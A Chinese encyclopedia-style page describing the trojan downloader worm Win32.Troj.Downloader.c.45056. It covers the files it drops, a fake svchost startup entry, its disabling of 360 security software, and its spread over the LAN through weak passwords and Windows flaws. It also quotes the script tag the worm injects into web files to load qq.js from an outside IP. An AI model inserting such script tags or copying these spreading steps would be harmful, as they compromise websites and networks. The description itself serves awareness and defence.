当前位置:首页 科普知识 感染虫下载器45056

感染虫下载器45056

发布时间:2023-09-06 03:17:47

这是一个木马病毒。该病毒运行后,会指定的网络上下载病毒程序,并且会搜索局域网内机器,以弱口令进行尝试性连接, 一旦连接成功,则判断该机器弱口令是否有足够的权限, 有则向该远程机器发送恶意数据,然后利用windows漏洞来下载程序,予以执行。

感染虫下载器45056详细介绍

这是一个木马病毒。该病毒运行后,会指定的网络上下载病毒程序,并且会搜索局域网内机器,以弱口令进行尝试性连接, 一旦连接成功,则判断该机器弱口令是否有足够的权限, 有则向该远程机器发送恶意数据,然后利用windows漏洞来下载程序,予以执行。

感染虫下载器45056

感染虫下载器45056基础信息

Win32.Troj.Downloader.c.45056

感染虫下载器45056病毒名称

感染虫下载器45056病毒别名:

威胁级别:

★★☆☆☆病毒类型:

感染虫下载器45056病毒长度

45056影响系统:

感染虫下载器45056

Win9x WinNT

感染虫下载器45056病毒行为

1.病毒运行后,产生以下病毒文件

%WINDIR% SYSTEM32tmipo.bat

%WINDIR% SYSTEM32taimpo.txt

2.添加病毒启动项

启动项名:svchost 对应路径:%documents and Settings%Administrator桌面ctfmon.exe

感染虫下载器45056

3.病毒会触发taimpo.bat病毒文件,用来关闭"360安全卫士",使用户的安全性能降低.

4.病毒会检测连接的远程机器,当远程机器的登录木马是弱口令时,则会对该机器进行攻击,最后下载adi.vbs到用户机器上.

5.遍历磁盘,查找*.htm、*.PHP、*.ASP等网页文件,开始感染,插入一段JS代码:

script language=javascript src=http://218.**.**.248/qq.js

温馨提示:
本文【感染虫下载器45056】由作者 爱百科 转载提供。 该文观点仅代表作者本人, 自学教育网 信息发布平台,仅提供信息存储空间服务, 若存在侵权问题,请及时联系管理员或作者进行删除。
(c)2008-2025 自学教育网 All Rights Reserved 汕头市灵创科技有限公司
粤ICP备2024240640号-6